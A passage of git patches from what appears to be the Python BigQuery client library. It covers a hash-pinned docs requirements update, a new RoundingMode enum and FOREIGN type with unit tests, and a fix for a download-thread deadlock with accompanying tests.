--hash=sha256:fa88b843d6e211393a37219e6a1c1df99d35e8fd90446f1118f4216e307e48cd \ + --hash=sha256:fc54db6c8593ef7d4b2a331b58653356cf04f67c960f584edb7c3d8c97e8f39e \ + --hash=sha256:fd4ec41f914fa74ad1b8304bbc634b3de73d2a0889bd32076342a573e0779e00 \ + --hash=sha256:ffc9202a29ab3920fa812879e95a9e78b2465fd10be7fcbd042899695d75e616 + # via requests +click==8.1.8 \ + --hash=sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2 \ + --hash=sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a + # via gcp-docuploader colorlog==6.9.0 \ --hash=sha256:5906e71acd67cb07a71e779c47c4bcb45fb8c2993eebe9e5adcd6a6f1b283eff \ --hash=sha256:bfba54a1b93b94f54e1f4fe48395725a3d92fd2a4af702f6bd70946bdc0c6ac2 - # via nox + # via + # gcp-docuploader + # nox distlib==0.3.9 \ --hash=sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87 \ --hash=sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403 @@ -20,10 +128,78 @@ filelock==3.16.1 \ --hash=sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0 \ --hash=sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435 # via virtualenv +gcp-docuploader==0.6.5 \ + --hash=sha256:30221d4ac3e5a2b9c69aa52fdbef68cc3f27d0e6d0d90e220fc024584b8d2318 \ + --hash=sha256:b7458ef93f605b9d46a4bf3a8dc1755dad1f31d030c8679edf304e343b347eea + # via -r requirements.in +google-api-core==2.24.0 \ + --hash=sha256:10d82ac0fca69c82a25b3efdeefccf6f28e02ebb97925a8cce8edbfe379929d9 \ + --hash=sha256:e255640547a597a4da010876d333208ddac417d60add22b6851a0c66a831fcaf + # via + # google-cloud-core + # google-cloud-storage +google-auth==2.37.0 \ + --hash=sha256:0054623abf1f9c83492c63d3f47e77f0a544caa3d40b2d98e099a611c2dd5d00 \ + --hash=sha256:42664f18290a6be591be5329a96fe30184be1a1badb7292a7f686a9659de9ca0 + # via + # google-api-core + # google-cloud-core + # google-cloud-storage +google-cloud-core==2.4.1 \ + --hash=sha256:9b7749272a812bde58fff28868d0c5e2f585b82f37e09a1f6ed2d4d10f134073 \ + --hash=sha256:a9e6a4422b9ac5c29f79a0ede9485473338e2ce78d91f2370c01e730eab22e61 + # via google-cloud-storage +google-cloud-storage==2.19.0 \ + --hash=sha256:aeb971b5c29cf8ab98445082cbfe7b161a1f48ed275822f59ed3f1524ea54fba \ + --hash=sha256:cd05e9e7191ba6cb68934d8eb76054d9be4562aa89dbc4236feee4d7d51342b2 + # via gcp-docuploader +google-crc32c==1.6.0 \ + --hash=sha256:05e2d8c9a2f853ff116db9706b4a27350587f341eda835f46db3c0a8c8ce2f24 \ + --hash=sha256:18e311c64008f1f1379158158bb3f0c8d72635b9eb4f9545f8cf990c5668e59d \ + --hash=sha256:236c87a46cdf06384f614e9092b82c05f81bd34b80248021f729396a78e55d7e \ + --hash=sha256:35834855408429cecf495cac67ccbab802de269e948e27478b1e47dfb6465e57 \ + --hash=sha256:386122eeaaa76951a8196310432c5b0ef3b53590ef4c317ec7588ec554fec5d2 \ + --hash=sha256:40b05ab32a5067525670880eb5d169529089a26fe35dce8891127aeddc1950e8 \ + --hash=sha256:48abd62ca76a2cbe034542ed1b6aee851b6f28aaca4e6551b5599b6f3ef175cc \ + --hash=sha256:50cf2a96da226dcbff8671233ecf37bf6e95de98b2a2ebadbfdf455e6d05df42 \ + --hash=sha256:51c4f54dd8c6dfeb58d1df5e4f7f97df8abf17a36626a217f169893d1d7f3e9f \ + --hash=sha256:5bcc90b34df28a4b38653c36bb5ada35671ad105c99cfe915fb5bed7ad6924aa \ + --hash=sha256:62f6d4a29fea082ac4a3c9be5e415218255cf11684ac6ef5488eea0c9132689b \ + --hash=sha256:6eceb6ad197656a1ff49ebfbbfa870678c75be4344feb35ac1edf694309413dc \ + --hash=sha256:7aec8e88a3583515f9e0957fe4f5f6d8d4997e36d0f61624e70469771584c760 \ + --hash=sha256:91ca8145b060679ec9176e6de4f89b07363d6805bd4760631ef254905503598d \ + --hash=sha256:a184243544811e4a50d345838a883733461e67578959ac59964e43cca2c791e7 \ + --hash=sha256:a9e4b426c3702f3cd23b933436487eb34e01e00327fac20c9aebb68ccf34117d \ + --hash=sha256:bb0966e1c50d0ef5bc743312cc730b533491d60585a9a08f897274e57c3f70e0 \ + --hash=sha256:bb8b3c75bd157010459b15222c3fd30577042a7060e29d42dabce449c087f2b3 \ + --hash=sha256:bd5e7d2445d1a958c266bfa5d04c39932dc54093fa391736dbfdb0f1929c1fb3 \ + --hash=sha256:c87d98c7c4a69066fd31701c4e10d178a648c2cac3452e62c6b24dc51f9fcc00 \ + --hash=sha256:d2952396dc604544ea7476b33fe87faedc24d666fb0c2d5ac971a2b9576ab871 \ + --hash=sha256:d8797406499f28b5ef791f339594b0b5fdedf54e203b5066675c406ba69d705c \ + --hash=sha256:d9e9913f7bd69e093b81da4535ce27af842e7bf371cde42d1ae9e9bd382dc0e9 \ + --hash=sha256:e2806553238cd076f0a55bddab37a532b53580e699ed8e5606d0de1f856b5205 \ + --hash=sha256:ebab974b1687509e5c973b5c4b8b146683e101e102e17a86bd196ecaa4d099fc \ + --hash=sha256:ed767bf4ba90104c1216b68111613f0d5926fb3780660ea1198fc469af410e9d \ + --hash=sha256:f7a1fc29803712f80879b0806cb83ab24ce62fc8daf0569f2204a0cfd7f68ed4 + # via + # google-cloud-storage + # google-resumable-media +google-resumable-media==2.7.2 \ + --hash=sha256:3ce7551e9fe6d99e9a126101d2536612bb73486721951e9562fee0f90c6ababa \ + --hash=sha256:5280aed4629f2b60b847b0d42f9857fd4935c11af266744df33d8074cae92fe0 + # via google-cloud-storage +googleapis-common-protos==1.66.0 \ + --hash=sha256:c3e7b33d15fdca5374cc0a7346dd92ffa847425cc4ea941d970f13680052ec8c \ + --hash=sha256:d7abcd75fabb2e0ec9f74466401f6c119a0b498e27370e9be4c94cb7e382b8ed + # via google-api-core +idna==3.10 \ + --hash=sha256:12f65c9b470abda6dc35cf8e63cc574b1c52b11df2c86030af0ac09b01b13ea9 \ + --hash=sha256:946d195a0d259cbba61165e88e65941f16e9b36ea6ddb97f00452bae8b1287d3 + # via requests nox==2024.10.9 \ --hash=sha256:1d36f309a0a2a853e9bccb76bbef6bb118ba92fa92674d15604ca99adeb29eab \ --hash=sha256:7aa9dc8d1c27e9f45ab046ffd1c3b2c4f7c91755304769df231308849ebded95 - # via -r synthtool/gcp/templates/python_library/.kokoro/docker/docs/requirements.in + # via -r requirements.in packaging==24.2 \ --hash=sha256:09abb1bccd265c01f4a3aa3f7a7db064b36514d2cba19a2f694fe6150451a759 \ --hash=sha256:c228a6dc5e932d346bc5739379109d49e8853dd8223571c7c5b55260edc0b97f @@ -32,6 +208,51 @@ platformdirs==4.3.6 \ --hash=sha256:357fb2acbc885b0419afd3ce3ed34564c13c9b95c89360cd9563f73aa5e2b907 \ --hash=sha256:73e575e1408ab8103900836b97580d5307456908a03e92031bab39e4554cc3fb # via virtualenv +proto-plus==1.25.0 \ + --hash=sha256:c91fc4a65074ade8e458e95ef8bac34d4008daa7cce4a12d6707066fca648961 \ + --hash=sha256:fbb17f57f7bd05a68b7707e745e26528b0b3c34e378db91eef93912c54982d91 + # via google-api-core +protobuf==5.29.3 \ + --hash=sha256:0a18ed4a24198528f2333802eb075e59dea9d679ab7a6c5efb017a59004d849f \ + --hash=sha256:0eb32bfa5219fc8d4111803e9a690658aa2e6366384fd0851064b963b6d1f2a7 \ + --hash=sha256:3ea51771449e1035f26069c4c7fd51fba990d07bc55ba80701c78f886bf9c888 \ + --hash=sha256:5da0f41edaf117bde316404bad1a486cb4ededf8e4a54891296f648e8e076620 \ + --hash=sha256:6ce8cc3389a20693bfde6c6562e03474c40851b44975c9b2bf6df7d8c4f864da \ + --hash=sha256:84a57163a0ccef3f96e4b6a20516cedcf5bb3a95a657131c5c3ac62200d23252 \ + --hash=sha256:a4fa6f80816a9a0678429e84973f2f98cbc218cca434abe8db2ad0bffc98503a \ + --hash=sha256:a8434404bbf139aa9e1300dbf989667a83d42ddda9153d8ab76e0d5dcaca484e \ + --hash=sha256:b89c115d877892a512f79a8114564fb435943b59067615894c3b13cd3e1fa107 \ + --hash=sha256:c027e08a08be10b67c06bf2370b99c811c466398c357e615ca88c91c07f0910f \ + --hash=sha256:daaf63f70f25e8689c072cfad4334ca0ac1d1e05a92fc15c54eb9cf23c3efd84 + # via + # gcp-docuploader + # google-api-core + # googleapis-common-protos + # proto-plus +pyasn1==0.6.1 \ + --hash=sha256:0d632f46f2ba09143da3a8afe9e33fb6f92fa2320ab7e886e2d0f7672af84629 \ + --hash=sha256:6f580d2bdd84365380830acf45550f2511469f673cb4a5ae3857a3170128b034 + # via + # pyasn1-modules + # rsa +pyasn1-modules==0.4.1 \ + --hash=sha256:49bfa96b45a292b711e986f222502c1c9a5e1f4e568fc30e2574a6c7d07838fd \ + --hash=sha256:c28e2dbf9c06ad61c71a075c7e0f9fd0f1b0bb2d2ad4377f240d33ac2ab60a7c + # via google-auth +requests==2.32.3 \ + --hash=sha256:55365417734eb18255590a9ff9eb97e9e1da868d4ccd6402399eaf68af20a760 \ + --hash=sha256:70761cfe03c773ceb22aa2f671b4757976145175cdfca038c02654d061d6dcc6 + # via + # google-api-core + # google-cloud-storage +rsa==4.9 \ + --hash=sha256:90260d9058e514786967344d0ef75fa8727eed8a7d2e43ce9f4bcf1b536174f7 \ + --hash=sha256:e38464a49c6c85d7f1351b0126661487a7e0a14a50f1675ec50eb34d4f20ef21 + # via google-auth +six==1.17.0 \ + --hash=sha256:4721f391ed90541fddacab5acf947aa0d3dc7d27b2e1e8eda2be8970586c3274 \ + --hash=sha256:ff70335d468e7eb6ec65b95b99d3a2836546063f63acc5171de367e834932a81 + # via gcp-docuploader tomli==2.2.1 \ --hash=sha256:023aa114dd824ade0100497eb2318602af309e5a55595f76b626d6d9f3b7b0a6 \ --hash=sha256:02abe224de6ae62c19f090f68da4e27b10af2b93213d36cf44e6e1c5abd19fdd \ @@ -66,7 +287,11 @@ tomli==2.2.1 \ --hash=sha256:ece47d672db52ac607a3d9599a9d48dcb2f2f735c6c2d1f34130085bb12b112a \ --hash=sha256:f4039b9cbc3048b2416cc57ab3bda989a6fcf9b36cf8937f01a6e731b64f80d7 # via nox -virtualenv==20.28.0 \ - --hash=sha256:23eae1b4516ecd610481eda647f3a7c09aea295055337331bb4e6892ecce47b0 \ - --hash=sha256:2c9c3262bb8e7b87ea801d715fae4495e6032450c71d2309be9550e7364049aa +urllib3==2.3.0 \ + --hash=sha256:1cee9ad369867bfdbbb48b7dd50374c0967a0bb7710050facf0dd6911440e3df \ + --hash=sha256:f8c5449b3cf0861679ce7e0503c7b44b5ec981bec0d1d3795a07f1ba96f0204d + # via requests +virtualenv==20.28.1 \ + --hash=sha256:412773c85d4dab0409b83ec36f7a6499e72eaf08c80e81e9576bca61831c71cb \ + --hash=sha256:5d34ab240fdb5d21549b76f9e8ff3af28252f5499fb6d6f031adac4e5a8c5329 # via nox diff --git a/.kokoro/publish-docs.sh b/.kokoro/publish-docs.sh index 233205d58..4ed4aaf13 100755 --- a/.kokoro/publish-docs.sh +++ b/.kokoro/publish-docs.sh @@ -20,10 +20,6 @@ export PYTHONUNBUFFERED=1 export PATH="${HOME}/.local/bin:${PATH}" -# Install nox -python3.10 -m pip install --require-hashes -r .kokoro/requirements.txt -python3.10 -m nox --version - # build docs nox -s docs From 3a4894827f6e73a4a88cb22933c2004697dabcc7 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 31 Jan 2025 13:59:10 -0500 Subject: [PATCH 059/202] feat: add roundingmode enum, wiring, and tests (#2121) * feat: adds roundingmode and entity types * Adds rounding_mode to schema file and tests * tweaks RoundingMode docstring and roundingmode logic * Updates tests to apply better coverage for rounding_mode * Modifies docstring * Removes client-side validation, simplifies some code * Updates foreign_type_definition processing --- google/cloud/bigquery/enums.py | 45 ++++++++++++++++++++++++- google/cloud/bigquery/schema.py | 59 +++++++++++++++++++++++++++++++-- tests/unit/test_schema.py | 56 ++++++++++++++++++++++++++++++- 3 files changed, 156 insertions(+), 4 deletions(-) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index d8cbe9969..5519bc989 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -246,6 +246,11 @@ class KeyResultStatementKind: class StandardSqlTypeNames(str, enum.Enum): + """Enum of allowed SQL type names in schema.SchemaField. + + Datatype used in GoogleSQL. + """ + def _generate_next_value_(name, start, count, last_values): return name @@ -267,6 +272,9 @@ def _generate_next_value_(name, start, count, last_values): ARRAY = enum.auto() STRUCT = enum.auto() RANGE = enum.auto() + # NOTE: FOREIGN acts as a wrapper for data types + # not natively understood by BigQuery unless translated + FOREIGN = enum.auto() class EntityTypes(str, enum.Enum): @@ -285,7 +293,10 @@ class EntityTypes(str, enum.Enum): # See also: https://cloud.google.com/bigquery/data-types#legacy_sql_data_types # and https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types class SqlTypeNames(str, enum.Enum): - """Enum of allowed SQL type names in schema.SchemaField.""" + """Enum of allowed SQL type names in schema.SchemaField. + + Datatype used in Legacy SQL. + """ STRING = "STRING" BYTES = "BYTES" @@ -306,6 +317,9 @@ class SqlTypeNames(str, enum.Enum): DATETIME = "DATETIME" INTERVAL = "INTERVAL" # NOTE: not available in legacy types RANGE = "RANGE" # NOTE: not available in legacy types + # NOTE: FOREIGN acts as a wrapper for data types + # not natively understood by BigQuery unless translated + FOREIGN = "FOREIGN" class WriteDisposition(object): @@ -344,3 +358,32 @@ class DeterminismLevel: NOT_DETERMINISTIC = "NOT_DETERMINISTIC" """The UDF is not deterministic.""" + + +class RoundingMode(str, enum.Enum): + """Rounding mode options that can be used when storing NUMERIC or BIGNUMERIC + values. + + ROUNDING_MODE_UNSPECIFIED: will default to using ROUND_HALF_AWAY_FROM_ZERO. + + ROUND_HALF_AWAY_FROM_ZERO: rounds half values away from zero when applying + precision and scale upon writing of NUMERIC and BIGNUMERIC values. + For Scale: 0 + * 1.1, 1.2, 1.3, 1.4 => 1 + * 1.5, 1.6, 1.7, 1.8, 1.9 => 2 + + ROUND_HALF_EVEN: rounds half values to the nearest even value when applying + precision and scale upon writing of NUMERIC and BIGNUMERIC values. + For Scale: 0 + * 1.1, 1.2, 1.3, 1.4 => 1 + * 1.5 => 2 + * 1.6, 1.7, 1.8, 1.9 => 2 + * 2.5 => 2 + """ + + def _generate_next_value_(name, start, count, last_values): + return name + + ROUNDING_MODE_UNSPECIFIED = enum.auto() + ROUND_HALF_AWAY_FROM_ZERO = enum.auto() + ROUND_HALF_EVEN = enum.auto() diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 42dfbfca8..0f011a275 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -22,14 +22,15 @@ from google.cloud.bigquery import _helpers from google.cloud.bigquery import standard_sql +from google.cloud.bigquery import enums from google.cloud.bigquery.enums import StandardSqlTypeNames _STRUCT_TYPES = ("RECORD", "STRUCT") # SQL types reference: -# https://cloud.google.com/bigquery/data-types#legacy_sql_data_types -# https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types +# LEGACY SQL: https://cloud.google.com/bigquery/data-types#legacy_sql_data_types +# GoogleSQL: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types LEGACY_TO_STANDARD_TYPES = { "STRING": StandardSqlTypeNames.STRING, "BYTES": StandardSqlTypeNames.BYTES, @@ -48,6 +49,7 @@ "DATE": StandardSqlTypeNames.DATE, "TIME": StandardSqlTypeNames.TIME, "DATETIME": StandardSqlTypeNames.DATETIME, + "FOREIGN": StandardSqlTypeNames.FOREIGN, # no direct conversion from ARRAY, the latter is represented by mode="REPEATED" } """String names of the legacy SQL types to integer codes of Standard SQL standard_sql.""" @@ -166,6 +168,35 @@ class SchemaField(object): the type is RANGE, this field is required. Possible values for the field element type of a RANGE include `DATE`, `DATETIME` and `TIMESTAMP`. + + rounding_mode: Union[enums.RoundingMode, str, None] + Specifies the rounding mode to be used when storing values of + NUMERIC and BIGNUMERIC type. + + Unspecified will default to using ROUND_HALF_AWAY_FROM_ZERO. + ROUND_HALF_AWAY_FROM_ZERO rounds half values away from zero + when applying precision and scale upon writing of NUMERIC and BIGNUMERIC + values. + + For Scale: 0 + 1.1, 1.2, 1.3, 1.4 => 1 + 1.5, 1.6, 1.7, 1.8, 1.9 => 2 + + ROUND_HALF_EVEN rounds half values to the nearest even value + when applying precision and scale upon writing of NUMERIC and BIGNUMERIC + values. + + For Scale: 0 + 1.1, 1.2, 1.3, 1.4 => 1 + 1.5 => 2 + 1.6, 1.7, 1.8, 1.9 => 2 + 2.5 => 2 + + foreign_type_definition: Optional[str] + Definition of the foreign data type. + + Only valid for top-level schema fields (not nested fields). + If the type is FOREIGN, this field is required. """ def __init__( @@ -181,11 +212,14 @@ def __init__( scale: Union[int, _DefaultSentinel] = _DEFAULT_VALUE, max_length: Union[int, _DefaultSentinel] = _DEFAULT_VALUE, range_element_type: Union[FieldElementType, str, None] = None, + rounding_mode: Union[enums.RoundingMode, str, None] = None, + foreign_type_definition: Optional[str] = None, ): self._properties: Dict[str, Any] = { "name": name, "type": field_type, } + self._properties["name"] = name if mode is not None: self._properties["mode"] = mode.upper() if description is not _DEFAULT_VALUE: @@ -206,6 +240,11 @@ def __init__( self._properties["rangeElementType"] = {"type": range_element_type} if isinstance(range_element_type, FieldElementType): self._properties["rangeElementType"] = range_element_type.to_api_repr() + if rounding_mode is not None: + self._properties["roundingMode"] = rounding_mode + if foreign_type_definition is not None: + self._properties["foreignTypeDefinition"] = foreign_type_definition + if fields: # Don't set the property if it's not set. self._properties["fields"] = [field.to_api_repr() for field in fields] @@ -304,6 +343,22 @@ def range_element_type(self): ret = self._properties.get("rangeElementType") return FieldElementType.from_api_repr(ret) + @property + def rounding_mode(self): + """Enum that specifies the rounding mode to be used when storing values of + NUMERIC and BIGNUMERIC type. + """ + return self._properties.get("roundingMode") + + @property + def foreign_type_definition(self): + """Definition of the foreign data type. + + Only valid for top-level schema fields (not nested fields). + If the type is FOREIGN, this field is required. + """ + return self._properties.get("foreignTypeDefinition") + @property def fields(self): """Optional[tuple]: Subfields contained in this field. diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index efbc5d26f..467f1e1de 100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -19,6 +19,7 @@ import pytest from google.cloud import bigquery +from google.cloud.bigquery import enums from google.cloud.bigquery.standard_sql import StandardSqlStructType from google.cloud.bigquery import schema from google.cloud.bigquery.schema import PolicyTagList @@ -49,6 +50,8 @@ def test_constructor_defaults(self): self.assertEqual(field.fields, ()) self.assertIsNone(field.policy_tags) self.assertIsNone(field.default_value_expression) + self.assertEqual(field.rounding_mode, None) + self.assertEqual(field.foreign_type_definition, None) def test_constructor_explicit(self): FIELD_DEFAULT_VALUE_EXPRESSION = "This is the default value for this field" @@ -64,6 +67,8 @@ def test_constructor_explicit(self): ) ), default_value_expression=FIELD_DEFAULT_VALUE_EXPRESSION, + rounding_mode=enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED, + foreign_type_definition="INTEGER", ) self.assertEqual(field.name, "test") self.assertEqual(field.field_type, "STRING") @@ -80,6 +85,8 @@ def test_constructor_explicit(self): ) ), ) + self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") + self.assertEqual(field.foreign_type_definition, "INTEGER") def test_constructor_explicit_none(self): field = self._make_one("test", "STRING", description=None, policy_tags=None) @@ -137,8 +144,16 @@ def test_to_api_repr(self): {"names": ["foo", "bar"]}, ) + ROUNDINGMODE = enums.RoundingMode.ROUNDING_MODE_UNSPECIFIED + field = self._make_one( - "foo", "INTEGER", "NULLABLE", description="hello world", policy_tags=policy + "foo", + "INTEGER", + "NULLABLE", + description="hello world", + policy_tags=policy, + rounding_mode=ROUNDINGMODE, + foreign_type_definition=None, ) self.assertEqual( field.to_api_repr(), @@ -148,6 +163,7 @@ def test_to_api_repr(self): "type": "INTEGER", "description": "hello world", "policyTags": {"names": ["foo", "bar"]}, + "roundingMode": "ROUNDING_MODE_UNSPECIFIED", }, ) @@ -181,6 +197,7 @@ def test_from_api_repr(self): "description": "test_description", "name": "foo", "type": "record", + "roundingMode": "ROUNDING_MODE_UNSPECIFIED", } ) self.assertEqual(field.name, "foo") @@ -192,6 +209,7 @@ def test_from_api_repr(self): self.assertEqual(field.fields[0].field_type, "INTEGER") self.assertEqual(field.fields[0].mode, "NULLABLE") self.assertEqual(field.range_element_type, None) + self.assertEqual(field.rounding_mode, "ROUNDING_MODE_UNSPECIFIED") def test_from_api_repr_policy(self): field = self._get_target_class().from_api_repr( @@ -283,6 +301,28 @@ def test_fields_property(self): schema_field = self._make_one("boat", "RECORD", fields=fields) self.assertEqual(schema_field.fields, fields) + def test_roundingmode_property_str(self): + ROUNDINGMODE = "ROUND_HALF_AWAY_FROM_ZERO" + schema_field = self._make_one("test", "STRING", rounding_mode=ROUNDINGMODE) + self.assertEqual(schema_field.rounding_mode, ROUNDINGMODE) + + del schema_field + schema_field = self._make_one("test", "STRING") + schema_field._properties["roundingMode"] = ROUNDINGMODE + self.assertEqual(schema_field.rounding_mode, ROUNDINGMODE) + + def test_foreign_type_definition_property_str(self): + FOREIGN_TYPE_DEFINITION = "INTEGER" + schema_field = self._make_one( + "test", "STRING", foreign_type_definition=FOREIGN_TYPE_DEFINITION + ) + self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + + del schema_field + schema_field = self._make_one("test", "STRING") + schema_field._properties["foreignTypeDefinition"] = FOREIGN_TYPE_DEFINITION + self.assertEqual(schema_field.foreign_type_definition, FOREIGN_TYPE_DEFINITION) + def test_to_standard_sql_simple_type(self): examples = ( # a few legacy types @@ -457,6 +497,20 @@ def test_to_standard_sql_unknown_type(self): bigquery.StandardSqlTypeNames.TYPE_KIND_UNSPECIFIED, ) + def test_to_standard_sql_foreign_type_valid(self): + legacy_type = "FOREIGN" + standard_type = bigquery.StandardSqlTypeNames.FOREIGN + foreign_type_definition = "INTEGER" + + field = self._make_one( + "some_field", + field_type=legacy_type, + foreign_type_definition=foreign_type_definition, + ) + standard_field = field.to_standard_sql() + self.assertEqual(standard_field.name, "some_field") + self.assertEqual(standard_field.type.type_kind, standard_type) + def test___eq___wrong_type(self): field = self._make_one("test", "STRING") other = object() From 54c8d07f06a8ae460c9e0fb1614e1fbc21efb5df Mon Sep 17 00:00:00 2001 From: Kien Truong Date: Tue, 4 Feb 2025 03:37:26 +0700 Subject: [PATCH 060/202] fix: avoid blocking in download thread when using BQ Storage API (#2034) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This prevents a deadlock between the main thead and download threads when the threadpool is shutdown prematurely. Co-authored-by: Chalmer Lowe Co-authored-by: Tim SweΓ±a (Swast) --- google/cloud/bigquery/_pandas_helpers.py | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index bf7d10c0f..050672531 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -796,10 +796,15 @@ def _download_table_bqstorage_stream( rowstream = reader.rows(session) for page in rowstream.pages: - if download_state.done: - return item = page_to_item(page) - worker_queue.put(item) + while True: + if download_state.done: + return + try: + worker_queue.put(item, timeout=_PROGRESS_INTERVAL) + break + except queue.Full: # pragma: NO COVER + continue def _nowait(futures): From 5e7d5eda5a8e9d32b38684a2e44f3e8e84e12876 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 6 Feb 2025 12:43:32 -0600 Subject: [PATCH 061/202] test: add unit test covering the case where worker streams are stopped early (#2127) * test: add unit test covering the case where worker streams are stopped early * use older pyarrow.record_batch constructor * remove flakey log-based tests from snippets * add a gc.collect() call to make sure threads are supposed to be cleaned up --- google/cloud/bigquery/_pandas_helpers.py | 69 ++++++++++---- samples/tests/test_download_public_data.py | 15 +-- .../test_download_public_data_sandbox.py | 17 +--- tests/unit/test__pandas_helpers.py | 93 +++++++++++++++++++ 4 files changed, 146 insertions(+), 48 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 050672531..4f70f6c29 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -20,6 +20,7 @@ from itertools import islice import logging import queue +import threading import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ -119,6 +120,21 @@ def __init__(self): # be an atomic operation in the Python language definition (enforced by # the global interpreter lock). self.done = False + # To assist with testing and understanding the behavior of the + # download, use this object as shared state to track how many worker + # threads have started and have gracefully shutdown. + self._started_workers_lock = threading.Lock() + self.started_workers = 0 + self._finished_workers_lock = threading.Lock() + self.finished_workers = 0 + + def start(self): + with self._started_workers_lock: + self.started_workers += 1 + + def finish(self): + with self._finished_workers_lock: + self.finished_workers += 1 BQ_FIELD_TYPE_TO_ARROW_FIELD_METADATA = { @@ -786,25 +802,35 @@ def _bqstorage_page_to_dataframe(column_names, dtypes, page): def _download_table_bqstorage_stream( download_state, bqstorage_client, session, stream, worker_queue, page_to_item ): - reader = bqstorage_client.read_rows(stream.name) + download_state.start() + try: + reader = bqstorage_client.read_rows(stream.name) - # Avoid deprecation warnings for passing in unnecessary read session. - # https://github.com/googleapis/python-bigquery-storage/issues/229 - if _versions_helpers.BQ_STORAGE_VERSIONS.is_read_session_optional: - rowstream = reader.rows() - else: - rowstream = reader.rows(session) - - for page in rowstream.pages: - item = page_to_item(page) - while True: - if download_state.done: - return - try: - worker_queue.put(item, timeout=_PROGRESS_INTERVAL) - break - except queue.Full: # pragma: NO COVER - continue + # Avoid deprecation warnings for passing in unnecessary read session. + # https://github.com/googleapis/python-bigquery-storage/issues/229 + if _versions_helpers.BQ_STORAGE_VERSIONS.is_read_session_optional: + rowstream = reader.rows() + else: + rowstream = reader.rows(session) + + for page in rowstream.pages: + item = page_to_item(page) + + # Make sure we set a timeout on put() so that we give the worker + # thread opportunities to shutdown gracefully, for example if the + # parent thread shuts down or the parent generator object which + # collects rows from all workers goes out of scope. See: + # https://github.com/googleapis/python-bigquery/issues/2032 + while True: + if download_state.done: + return + try: + worker_queue.put(item, timeout=_PROGRESS_INTERVAL) + break + except queue.Full: + continue + finally: + download_state.finish() def _nowait(futures): @@ -830,6 +856,7 @@ def _download_table_bqstorage( page_to_item: Optional[Callable] = None, max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, + download_state: Optional[_DownloadState] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -857,6 +884,9 @@ def _download_table_bqstorage( is True, the requested streams are limited to 1 regardless of the `max_stream_count` value. If 0 or None, then the number of requested streams will be unbounded. Defaults to None. + download_state (Optional[_DownloadState]): + A threadsafe state object which can be used to observe the + behavior of the worker threads created by this method. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -915,7 +945,8 @@ def _download_table_bqstorage( # Use _DownloadState to notify worker threads when to quit. # See: https://stackoverflow.com/a/29237343/101923 - download_state = _DownloadState() + if download_state is None: + download_state = _DownloadState() # Create a queue to collect frames as they are created in each thread. # diff --git a/samples/tests/test_download_public_data.py b/samples/tests/test_download_public_data.py index 02c2c6f9c..4f6c02452 100644 --- a/samples/tests/test_download_public_data.py +++ b/samples/tests/test_download_public_data.py @@ -12,8 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import logging - import pytest from .. import download_public_data @@ -21,20 +19,9 @@ pytest.importorskip("google.cloud.bigquery_storage_v1") -def test_download_public_data( - caplog: pytest.LogCaptureFixture, capsys: pytest.CaptureFixture[str] -) -> None: - # Enable debug-level logging to verify the BigQuery Storage API is used. - caplog.set_level(logging.DEBUG) - +def test_download_public_data(capsys: pytest.CaptureFixture[str]) -> None: download_public_data.download_public_data() out, _ = capsys.readouterr() assert "year" in out assert "gender" in out assert "name" in out - - assert any( - "Started reading table 'bigquery-public-data.usa_names.usa_1910_current' with BQ Storage API session" - in message - for message in caplog.messages - ) diff --git a/samples/tests/test_download_public_data_sandbox.py b/samples/tests/test_download_public_data_sandbox.py index e86f604ad..d3dd31a38 100644 --- a/samples/tests/test_download_public_data_sandbox.py +++ b/samples/tests/test_download_public_data_sandbox.py @@ -12,8 +12,6 @@ # See the License for the specific language governing permissions and # limitations under the License. -import logging - import pytest from .. import download_public_data_sandbox @@ -21,20 +19,9 @@ pytest.importorskip("google.cloud.bigquery_storage_v1") -def test_download_public_data_sandbox( - caplog: pytest.LogCaptureFixture, capsys: pytest.CaptureFixture[str] -) -> None: - # Enable debug-level logging to verify the BigQuery Storage API is used. - caplog.set_level(logging.DEBUG) - +def test_download_public_data_sandbox(capsys: pytest.CaptureFixture[str]) -> None: download_public_data_sandbox.download_public_data_sandbox() - out, err = capsys.readouterr() + out, _ = capsys.readouterr() assert "year" in out assert "gender" in out assert "name" in out - - assert any( - # An anonymous table is used because this sample reads from query results. - ("Started reading table" in message and "BQ Storage API session" in message) - for message in caplog.messages - ) diff --git 